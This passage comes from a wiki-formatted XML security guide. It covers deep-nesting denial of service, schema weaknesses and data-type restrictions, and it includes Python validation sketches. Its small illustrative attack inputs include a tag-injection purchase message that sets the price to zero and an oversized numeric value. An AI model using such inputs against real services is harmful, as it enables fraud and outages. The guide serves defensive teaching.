 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
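&lt;br /&gt;
One possible defence is to cap the nesting depth while parsing. The Python sketch below does this with the expat binding from the standard library; the names DepthExceeded and check_depth, and any particular limit, are assumptions made for this example rather than recommended values.&lt;br /&gt;

```python
import xml.parsers.expat


class DepthExceeded(ValueError):
    """Raised when elements are nested deeper than the configured limit."""


def check_depth(payload, max_depth):
    """Parse payload (bytes) and abort once nesting exceeds max_depth.

    Returns True when the document is well formed and within the limit.
    """
    parser = xml.parsers.expat.ParserCreate()
    depth = 0

    def on_start(name, attributes):
        nonlocal depth
        depth += 1
        if depth > max_depth:
            raise DepthExceeded("nesting deeper than %d elements" % max_depth)

    def on_end(name):
        nonlocal depth
        depth -= 1

    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.Parse(payload, True)
    return True
```

The check fires as soon as the limit is crossed, so the remaining open tags are never processed.&lt;br /&gt;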
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
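&lt;br /&gt;
A structural check of this kind can be sketched in Python with the ElementTree module from the standard library. It only verifies the order and number of child elements and is not a substitute for schema validation; the names EXPECTED_CHILDREN and has_expected_structure are assumptions made for this example.&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

EXPECTED_CHILDREN = ["id", "price"]


def has_expected_structure(document):
    """Return True only if the root is buy with exactly one id, then one price."""
    try:
        root = ET.fromstring(document)
    except ET.ParseError:
        # Malformed documents are rejected outright.
        return False
    if root.tag != "buy":
        return False
    return [child.tag for child in root] == EXPECTED_CHILDREN
```

The tampered message shown above has four children (id, price, id, price), so the comparison fails and the message can be rejected before any value is read.&lt;br /&gt;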
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema.&lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might cause a negative result on the user’s account. To avoid that logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
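&lt;br /&gt;
When the same rule has to be enforced in application code, it can be sketched in Python as follows. The function name parse_positive_integer is an assumption made for this example, and the pattern approximates the lexical form of &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; (an optional plus sign followed by ASCII digits).&lt;br /&gt;

```python
import re

# Optional plus sign followed by one or more ASCII digits.
POSITIVE_INTEGER = re.compile(r"\+?[0-9]+")


def parse_positive_integer(text):
    """Return text as an int, or raise ValueError unless it is 1 or greater."""
    candidate = text.strip()
    if POSITIVE_INTEGER.fullmatch(candidate) is None:
        raise ValueError("not an unsigned integer: %r" % text)
    value = int(candidate)
    if not value >= 1:
        raise ValueError("must be greater than zero: %r" % text)
    return value
```

Rejecting zero as well as negative numbers also protects later code that uses the value as a denominator.&lt;br /&gt;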
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
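With the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type, a price set to Infinity or NaN will not trigger any errors in the application, because these values are not valid and are rejected during validation. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;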
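&lt;br /&gt;
The difference between the two families of types can be illustrated in Python. The sketch below accepts only plain decimal notation for a price; the name parse_price is an assumption made for this example, and the pattern approximates the lexical form of &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; (no exponent and no special values).&lt;br /&gt;

```python
import re
from decimal import Decimal

# Optional sign, then digits with an optional fractional part.
DECIMAL_LEXICAL = re.compile(r"[+-]?([0-9]+(\.[0-9]*)?|\.[0-9]+)")


def parse_price(text):
    """Return text as a Decimal, rejecting NaN, Infinity and exponents."""
    candidate = text.strip()
    if DECIMAL_LEXICAL.fullmatch(candidate) is None:
        raise ValueError("not a plain decimal number: %r" % text)
    return Decimal(candidate)
```

By contrast, the built-in float constructor in Python parses both "NaN" and "Infinity" without raising an error, which mirrors the risk of declaring a price as &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt;.&lt;br /&gt;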
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
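&lt;br /&gt;
The same whitelist can be mirrored in application code. In the Python sketch below the names ALLOWED_MONTHS and is_valid_month are assumptions made for this example; the comparison is exact and case-sensitive, like an enumeration on a string type.&lt;br /&gt;

```python
ALLOWED_MONTHS = frozenset([
    "January", "February", "March", "April", "May", "June",
    "July", "August", "September", "October", "November", "December",
])


def is_valid_month(text):
    """Return True only for one of the twelve enumerated month names."""
    return text in ALLOWED_MONTHS
```

Any other string, including a correctly spelled month in a different case, is rejected.&lt;br /&gt;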
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When valid values must have one specific length (say, 8 characters), that length can be required as follows:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
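&lt;br /&gt;
The length facets above can be sketched in application code as follows. This is a minimal Python illustration, not a replacement for schema validation; the function names and default bounds are assumptions taken from the two schema examples:&lt;br /&gt;

```python
def has_valid_length(value: str, min_length: int = 3, max_length: int = 256) -> bool:
    """Mirror of minLength/maxLength: both bounds are inclusive."""
    return len(value) >= min_length and max_length >= len(value)


def has_exact_length(value: str, length: int = 8) -> bool:
    """Mirror of the length facet: the value must have exactly this many characters."""
    return len(value) == length


print(has_valid_length("Bob"))        # True
print(has_valid_length("Al"))         # False: shorter than minLength
print(has_valid_length("x" * 257))    # False: longer than maxLength
print(has_exact_length("12345678"))   # True
```

Both helpers count characters, which matches how the facets measure a value based on &amp;lt;tt&amp;gt;xs:string&amp;lt;/tt&amp;gt;.&lt;br /&gt;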
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
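&lt;br /&gt;
For comparison, the same pattern can be checked in application code. The following Python sketch uses the standard &amp;lt;tt&amp;gt;re&amp;lt;/tt&amp;gt; module; &amp;lt;tt&amp;gt;SSN_PATTERN&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;is_valid_ssn&amp;lt;/tt&amp;gt; are names assumed for this example, and the whitespace normalization that &amp;lt;tt&amp;gt;xs:token&amp;lt;/tt&amp;gt; applies is not reproduced:&lt;br /&gt;

```python
import re

# Same expression as the xs:pattern facet in the schema example.
SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(value: str) -> bool:
    """Return True when the whole value matches the SSN pattern."""
    # XML Schema patterns must match the entire value, so fullmatch() is
    # used instead of search() or match().
    return SSN_PATTERN.fullmatch(value) is not None


print(is_valid_ssn("123-45-6789"))     # True
print(is_valid_ssn("123-45-67890"))    # False: one digit too many
print(is_valid_ssn("123456789"))       # False: hyphens are required
```

Using &amp;lt;tt&amp;gt;fullmatch&amp;lt;/tt&amp;gt; matters: a partial match would accept values that merely contain something shaped like an SSN.&lt;br /&gt;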
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes in XML schemas. They were introduced in XML Schema 1.1, so a validator limited to version 1.0 will not accept them. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is never zero, while still allowing negative numbers as valid denominators.&lt;br /&gt;
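&lt;br /&gt;
A rough application-side equivalent of this assertion is sketched below in Python. The function name &amp;lt;tt&amp;gt;is_valid_denominator&amp;lt;/tt&amp;gt; is an assumption for this example; the regular expression approximates the lexical form of &amp;lt;tt&amp;gt;xs:integer&amp;lt;/tt&amp;gt; (an optional sign followed by digits):&lt;br /&gt;

```python
import re

# Optional sign followed by one or more decimal digits.
INTEGER_LEXICAL = re.compile(r"[+-]?[0-9]+")


def is_valid_denominator(raw: str) -> bool:
    """Accept any integer except zero, like the assertion on $value."""
    if INTEGER_LEXICAL.fullmatch(raw) is None:
        return False
    return int(raw) != 0


print(is_valid_denominator("7"))     # True
print(is_valid_denominator("-3"))    # True: negative values are allowed
print(is_valid_denominator("0"))     # False
print(is_valid_denominator("abc"))   # False: not an integer
```

The lexical check runs first so that inputs Python would otherwise tolerate, such as digits separated by underscores, are rejected.&lt;br /&gt;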
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences forces the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could have a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;0&amp;lt;/tt&amp;gt;, and if there is no limit on the maximum number, it could have a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
